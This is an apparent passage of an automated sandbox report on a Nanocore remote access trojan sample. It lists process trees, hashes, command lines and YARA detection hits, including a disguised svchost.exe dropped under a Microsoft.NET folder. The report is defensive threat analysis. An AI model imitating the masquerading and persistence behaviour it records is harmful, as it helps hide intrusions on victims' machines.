                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.951074840.00000000051C0000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 0000000D.00000002.945545205.0000000003B39000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 0000000D.00000002.949065366.0000000004EE0000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              Reputation:moderate

                                                                                                              Analysis Process: svchost.exe PID: 6176 Parent PID: 568

                                                                                                              General

                                                                                                              Start time:15:10:27
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\System32\svchost.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                              Imagebase:0x7ff6eb840000
                                                                                                              File size:51288 bytes
                                                                                                              MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: WerFault.exe PID: 6216 Parent PID: 6176

                                                                                                              General

                                                                                                              Start time:15:10:28
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2016 -ip 2016
                                                                                                              Imagebase:0x1b0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Reputation:high

                                                                                                              Analysis Process: explorer.exe PID: 6224 Parent PID: 3424

                                                                                                              General

                                                                                                              Start time:15:10:29
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:'C:\Windows\explorer.exe' 'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              Analysis Process: WerFault.exe PID: 6252 Parent PID: 2016

                                                                                                              General

                                                                                                              Start time:15:10:30
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 2016 -s 2180
                                                                                                              Imagebase:0x1b0000
                                                                                                              File size:434592 bytes
                                                                                                              MD5 hash:9E2B8ACAD48ECCA55C0230D63623661B
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET

                                                                                                              Analysis Process: explorer.exe PID: 6292 Parent PID: 800

                                                                                                              General

                                                                                                              Start time:15:10:32
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\explorer.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
                                                                                                              Imagebase:0x7ff6fee60000
                                                                                                              File size:3933184 bytes
                                                                                                              MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:C, C++ or other language

                                                                                                              Analysis Process: svchost.exe PID: 6408 Parent PID: 6292

                                                                                                              General

                                                                                                              Start time:15:10:34
                                                                                                              Start date:25/02/2021
                                                                                                              Path:C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:'C:\Windows\Microsoft.NET\Framework\xrpSendfsxM\svchost.exe'
                                                                                                              Imagebase:0xa0000
                                                                                                              File size:38008 bytes
                                                                                                              MD5 hash:A0F103F98EDE4DA72E178EE05DABE1E1
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:true
                                                                                                              Programmed in:.Net C# or VB.NET
                                                                                                              Yara matches:
                                                                                                              • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Florian Roth
                                                                                                              • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                              • Rule: NanoCore, Description: unknown, Source: 00000013.00000002.972750680.0000000006A65000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>

                                                                                                              Disassembly

                                                                                                              Code Analysis

                                                                                                              Reset < >